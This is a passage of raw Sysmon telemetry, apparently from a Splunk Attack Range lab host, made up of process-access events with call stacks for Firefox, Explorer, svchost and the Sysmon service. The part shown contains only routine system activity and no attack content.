Files\Mozilla Firefox\xul.dll+b873b1|C:\Program Files\Mozilla Firefox\xul.dll+b635c3|C:\Program Files\Mozilla Firefox\xul.dll+b63777|C:\Program Files\Mozilla Firefox\xul.dll+b872cf|C:\Program Files\Mozilla Firefox\xul.dll+bf8745|C:\Program Files\Mozilla Firefox\xul.dll+bf7923|C:\Program Files\Mozilla Firefox\xul.dll+bf6fc1|C:\Program Files\Mozilla Firefox\xul.dll+beec83|C:\Program Files\Mozilla Firefox\xul.dll+bf8370|C:\Program Files\Mozilla Firefox\xul.dll+fc0059|C:\Program Files\Mozilla Firefox\xul.dll+1a25bf8|C:\Program Files\Mozilla Firefox\xul.dll+b820d4|C:\Program Files\Mozilla Firefox\xul.dll+fdaf04|C:\Program Files\Mozilla Firefox\xul.dll+f46937|C:\Program Files\Mozilla Firefox\xul.dll+2cea6a|C:\Program Files\Mozilla Firefox\xul.dll+eb6c37|C:\Program Files\Mozilla Firefox\xul.dll+eb67ec|C:\Program Files\Mozilla Firefox\xul.dll+2b70e2|C:\Program Files\Mozilla Firefox\xul.dll+eb5f76|C:\Program Files\Mozilla Firefox\xul.dll+eb5e89 10341000x8000000000000000105194Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.509{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+9f23c4|C:\Program Files\Mozilla Firefox\xul.dll+a16469|C:\Program Files\Mozilla Firefox\xul.dll+a1638a|C:\Program Files\Mozilla Firefox\xul.dll+a15f79|C:\Program Files\Mozilla Firefox\xul.dll+a120ff|C:\Program Files\Mozilla Firefox\xul.dll+a1240c|C:\Program Files\Mozilla Firefox\xul.dll+b695f9|C:\Program Files\Mozilla Firefox\xul.dll+b7958a|C:\Program Files\Mozilla Firefox\xul.dll+b56ab9|C:\Program Files\Mozilla Firefox\xul.dll+b6c350|C:\Program Files\Mozilla Firefox\xul.dll+1a24c7c|C:\Program Files\Mozilla Firefox\xul.dll+192fc92|C:\Program Files\Mozilla Firefox\xul.dll+192dfcc|C:\Program Files\Mozilla Firefox\xul.dll+1b1c2f7|C:\Program Files\Mozilla Firefox\xul.dll+1b1b19f|C:\Program Files\Mozilla Firefox\xul.dll+192a5fa|C:\Program Files\Mozilla Firefox\xul.dll+1b3e634|C:\Program Files\Mozilla Firefox\xul.dll+1a25bf8|C:\Program Files\Mozilla Firefox\xul.dll+b820d4|C:\Program Files\Mozilla Firefox\xul.dll+fdaf04|C:\Program Files\Mozilla Firefox\xul.dll+f46937 10341000x8000000000000000105193Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.509{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+9f23c4|C:\Program Files\Mozilla Firefox\xul.dll+b873b1|C:\Program Files\Mozilla Firefox\xul.dll+b635c3|C:\Program Files\Mozilla Firefox\xul.dll+b63777|C:\Program Files\Mozilla Firefox\xul.dll+b872cf|C:\Program Files\Mozilla Firefox\xul.dll+bf8745|C:\Program Files\Mozilla Firefox\xul.dll+bf7923|C:\Program Files\Mozilla Firefox\xul.dll+bf6fc1|C:\Program Files\Mozilla Firefox\xul.dll+beec83|C:\Program Files\Mozilla Firefox\xul.dll+bf8370|C:\Program Files\Mozilla Firefox\xul.dll+fc0059|C:\Program Files\Mozilla Firefox\xul.dll+1a25bf8|C:\Program Files\Mozilla Firefox\xul.dll+b820d4|C:\Program Files\Mozilla Firefox\xul.dll+fdaf04|C:\Program Files\Mozilla Firefox\xul.dll+f46937|C:\Program Files\Mozilla Firefox\xul.dll+2cea6a|C:\Program Files\Mozilla Firefox\xul.dll+eb6c37|C:\Program Files\Mozilla Firefox\xul.dll+eb67ec|C:\Program Files\Mozilla Firefox\xul.dll+2b70e2|C:\Program Files\Mozilla Firefox\xul.dll+eb5f76|C:\Program Files\Mozilla Firefox\xul.dll+eb5e89 10341000x8000000000000000105192Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.509{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+9f23c4|C:\Program Files\Mozilla Firefox\xul.dll+b873b1|C:\Program Files\Mozilla Firefox\xul.dll+b635c3|C:\Program Files\Mozilla Firefox\xul.dll+b63777|C:\Program Files\Mozilla Firefox\xul.dll+b872cf|C:\Program Files\Mozilla Firefox\xul.dll+bf8745|C:\Program Files\Mozilla Firefox\xul.dll+bf7923|C:\Program Files\Mozilla Firefox\xul.dll+bf6fc1|C:\Program Files\Mozilla Firefox\xul.dll+beec83|C:\Program Files\Mozilla Firefox\xul.dll+bf8370|C:\Program Files\Mozilla Firefox\xul.dll+fc0059|C:\Program Files\Mozilla Firefox\xul.dll+1a25bf8|C:\Program Files\Mozilla Firefox\xul.dll+fe17ac|C:\Program Files\Mozilla Firefox\xul.dll+1a25bf8|C:\Program Files\Mozilla Firefox\xul.dll+b820d4|C:\Program Files\Mozilla Firefox\xul.dll+fdaf04|C:\Program Files\Mozilla Firefox\xul.dll+f46937|C:\Program Files\Mozilla Firefox\xul.dll+2cea6a|C:\Program Files\Mozilla Firefox\xul.dll+eb6c37|C:\Program Files\Mozilla Firefox\xul.dll+eb67ec|C:\Program Files\Mozilla Firefox\xul.dll+2b70e2 10341000x8000000000000000105191Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.509{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+9f23c4|C:\Program Files\Mozilla Firefox\xul.dll+b873b1|C:\Program Files\Mozilla Firefox\xul.dll+b635c3|C:\Program Files\Mozilla Firefox\xul.dll+b63777|C:\Program Files\Mozilla Firefox\xul.dll+b872cf|C:\Program Files\Mozilla Firefox\xul.dll+bf8745|C:\Program Files\Mozilla Firefox\xul.dll+bf7923|C:\Program Files\Mozilla Firefox\xul.dll+bf6fc1|C:\Program Files\Mozilla Firefox\xul.dll+beec83|C:\Program Files\Mozilla Firefox\xul.dll+bf8370|C:\Program Files\Mozilla Firefox\xul.dll+fc0059|C:\Program Files\Mozilla Firefox\xul.dll+1a25bf8|C:\Program Files\Mozilla Firefox\xul.dll+fe17ac|C:\Program Files\Mozilla Firefox\xul.dll+1a25bf8|C:\Program Files\Mozilla Firefox\xul.dll+b820d4|C:\Program Files\Mozilla Firefox\xul.dll+fdaf04|C:\Program Files\Mozilla Firefox\xul.dll+f46937|C:\Program Files\Mozilla Firefox\xul.dll+2cea6a|C:\Program Files\Mozilla Firefox\xul.dll+eb6c37|C:\Program Files\Mozilla Firefox\xul.dll+eb67ec|C:\Program Files\Mozilla Firefox\xul.dll+2b70e2 10341000x8000000000000000105190Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.493{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+9f23c4|C:\Program Files\Mozilla Firefox\xul.dll+b873b1|C:\Program Files\Mozilla Firefox\xul.dll+b635c3|C:\Program Files\Mozilla Firefox\xul.dll+b63777|C:\Program Files\Mozilla Firefox\xul.dll+b872cf|C:\Program Files\Mozilla Firefox\xul.dll+bf8745|C:\Program Files\Mozilla Firefox\xul.dll+bf7923|C:\Program Files\Mozilla Firefox\xul.dll+bf6fc1|C:\Program Files\Mozilla Firefox\xul.dll+beec83|C:\Program Files\Mozilla Firefox\xul.dll+bf8370|C:\Program Files\Mozilla Firefox\xul.dll+fc0059|C:\Program Files\Mozilla Firefox\xul.dll+1a25bf8|C:\Program Files\Mozilla Firefox\xul.dll+fe17ac|C:\Program Files\Mozilla Firefox\xul.dll+1a25bf8|C:\Program Files\Mozilla Firefox\xul.dll+b820d4|C:\Program Files\Mozilla Firefox\xul.dll+fdaf04|C:\Program Files\Mozilla Firefox\xul.dll+f46937|C:\Program Files\Mozilla Firefox\xul.dll+2cea6a|C:\Program Files\Mozilla Firefox\xul.dll+eb6c37|C:\Program Files\Mozilla Firefox\xul.dll+eb67ec|C:\Program Files\Mozilla Firefox\xul.dll+2b70e2 10341000x8000000000000000105189Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.493{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+9f23c4|C:\Program Files\Mozilla Firefox\xul.dll+b873b1|C:\Program Files\Mozilla Firefox\xul.dll+b635c3|C:\Program Files\Mozilla Firefox\xul.dll+b63777|C:\Program Files\Mozilla Firefox\xul.dll+b872cf|C:\Program Files\Mozilla Firefox\xul.dll+bf8745|C:\Program Files\Mozilla Firefox\xul.dll+bf7923|C:\Program Files\Mozilla Firefox\xul.dll+bf6fc1|C:\Program Files\Mozilla Firefox\xul.dll+beec83|C:\Program Files\Mozilla Firefox\xul.dll+bf8370|C:\Program Files\Mozilla Firefox\xul.dll+fc0059|C:\Program Files\Mozilla Firefox\xul.dll+1a25bf8|C:\Program Files\Mozilla Firefox\xul.dll+b820d4|C:\Program Files\Mozilla Firefox\xul.dll+fdaf04|C:\Program Files\Mozilla Firefox\xul.dll+f46937|C:\Program Files\Mozilla Firefox\xul.dll+2cea6a|C:\Program Files\Mozilla Firefox\xul.dll+eb6c37|C:\Program Files\Mozilla Firefox\xul.dll+eb67ec|C:\Program Files\Mozilla Firefox\xul.dll+2b70e2|C:\Program Files\Mozilla Firefox\xul.dll+eb5f76|C:\Program Files\Mozilla Firefox\xul.dll+eb5e89 10341000x8000000000000000105188Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.493{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+9f23c4|C:\Program Files\Mozilla Firefox\xul.dll+b873b1|C:\Program Files\Mozilla Firefox\xul.dll+b635c3|C:\Program Files\Mozilla Firefox\xul.dll+b63777|C:\Program Files\Mozilla Firefox\xul.dll+b872cf|C:\Program Files\Mozilla Firefox\xul.dll+bf8745|C:\Program Files\Mozilla Firefox\xul.dll+bf7923|C:\Program Files\Mozilla Firefox\xul.dll+bf6fc1|C:\Program Files\Mozilla Firefox\xul.dll+beec83|C:\Program Files\Mozilla Firefox\xul.dll+bf8370|C:\Program Files\Mozilla Firefox\xul.dll+fc0059|C:\Program Files\Mozilla Firefox\xul.dll+1a25bf8|C:\Program Files\Mozilla Firefox\xul.dll+b820d4|C:\Program Files\Mozilla Firefox\xul.dll+fdaf04|C:\Program Files\Mozilla Firefox\xul.dll+f46937|C:\Program Files\Mozilla Firefox\xul.dll+2cea6a|C:\Program Files\Mozilla Firefox\xul.dll+eb6c37|C:\Program Files\Mozilla Firefox\xul.dll+eb67ec|C:\Program Files\Mozilla Firefox\xul.dll+2b70e2|C:\Program Files\Mozilla Firefox\xul.dll+eb5f76|C:\Program Files\Mozilla Firefox\xul.dll+eb5e89 10341000x8000000000000000105187Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.493{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+9f23c4|C:\Program Files\Mozilla Firefox\xul.dll+a16469|C:\Program Files\Mozilla Firefox\xul.dll+a1638a|C:\Program Files\Mozilla Firefox\xul.dll+a15f79|C:\Program Files\Mozilla Firefox\xul.dll+a120ff|C:\Program Files\Mozilla Firefox\xul.dll+a1240c|C:\Program Files\Mozilla Firefox\xul.dll+b5f98a|C:\Program Files\Mozilla Firefox\xul.dll+2dbf19|C:\Program Files\Mozilla Firefox\xul.dll+2dbe24|C:\Program Files\Mozilla Firefox\xul.dll+2dbc0d|C:\Program Files\Mozilla Firefox\xul.dll+2dbaa4|C:\Program Files\Mozilla Firefox\xul.dll+bab3e3|C:\Program Files\Mozilla Firefox\xul.dll+bac0d1|C:\Program Files\Mozilla Firefox\xul.dll+bab0dd|C:\Program Files\Mozilla Firefox\xul.dll+bab032|C:\Program Files\Mozilla Firefox\xul.dll+b7c131|C:\Program Files\Mozilla Firefox\xul.dll+1a25c2a|C:\Program Files\Mozilla Firefox\xul.dll+b820d4|C:\Program Files\Mozilla Firefox\xul.dll+fdaf04|C:\Program Files\Mozilla Firefox\xul.dll+f46937|C:\Program Files\Mozilla Firefox\xul.dll+2cea6a 10341000x8000000000000000105186Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.493{58E9C193-AE68-615A-C800-00000000FC01}45484800C:\Windows\Explorer.EXE{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61884|C:\Windows\System32\SHELL32.dll+62df7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105185Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.478{58E9C193-AE68-615A-C800-00000000FC01}45485880C:\Windows\Explorer.EXE{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61884|C:\Windows\System32\SHELL32.dll+62df7|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105184Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.478{58E9C193-AE68-615A-C800-00000000FC01}45485880C:\Windows\Explorer.EXE{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105183Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.462{58E9C193-B422-615A-0602-00000000FC01}55524812C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0902-00000000FC01}6624C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+9f23c4|C:\Program Files\Mozilla Firefox\xul.dll+a0b461|C:\Program Files\Mozilla Firefox\xul.dll+a6c6e5|C:\Program Files\Mozilla Firefox\xul.dll+d0281|C:\Program Files\Mozilla Firefox\xul.dll+19d6412|C:\Program Files\Mozilla Firefox\xul.dll+1747b79|C:\Program Files\Mozilla Firefox\xul.dll+167b2d9|C:\Program Files\Mozilla Firefox\xul.dll+2680a|C:\Program Files\Mozilla Firefox\xul.dll+9f4b1f|C:\Program Files\Mozilla Firefox\xul.dll+2660e|C:\Program Files\Mozilla Firefox\xul.dll+8b45d7|C:\Program Files\Mozilla Firefox\nss3.dll+7647d|C:\Program Files\Mozilla Firefox\nss3.dll+8e401|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105182Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.447{58E9C193-AE68-615A-C800-00000000FC01}45485108C:\Windows\Explorer.EXE{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61884|C:\Windows\System32\SHELL32.dll+62820|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105181Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.447{58E9C193-AE68-615A-C800-00000000FC01}45485108C:\Windows\Explorer.EXE{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+f5319|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000105180Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.447{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1AA44846A0B82150777F72B42752732A,SHA256=A7E4E46A9D567FC3B71E851565466DEFCECEE3F9BB8584712CAE32D20300E706,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000105179Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.428{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-B426-615A-0C02-00000000FC01}5276C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105178Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.426{58E9C193-ACA7-615A-1100-00000000FC01}3601664C:\Windows\system32\svchost.exe{58E9C193-B426-615A-0C02-00000000FC01}5276C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105177Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.425{58E9C193-ACA7-615A-1100-00000000FC01}3601336C:\Windows\system32\svchost.exe{58E9C193-B426-615A-0C02-00000000FC01}5276C:\Program Files\Mozilla Firefox\firefox.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105176Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.419{58E9C193-B426-615A-0C02-00000000FC01}52767120C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0B02-00000000FC01}4480C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+7396|C:\Program Files\Mozilla Firefox\firefox.exe+57b9|C:\Program Files\Mozilla Firefox\firefox.exe+1bbb8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105175Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.402{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105174Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.402{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105173Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.388{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105172Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.388{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105171Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.388{58E9C193-AE62-615A-B200-00000000FC01}32123188C:\Windows\system32\csrss.exe{58E9C193-B426-615A-0C02-00000000FC01}5276C:\Program Files\Mozilla 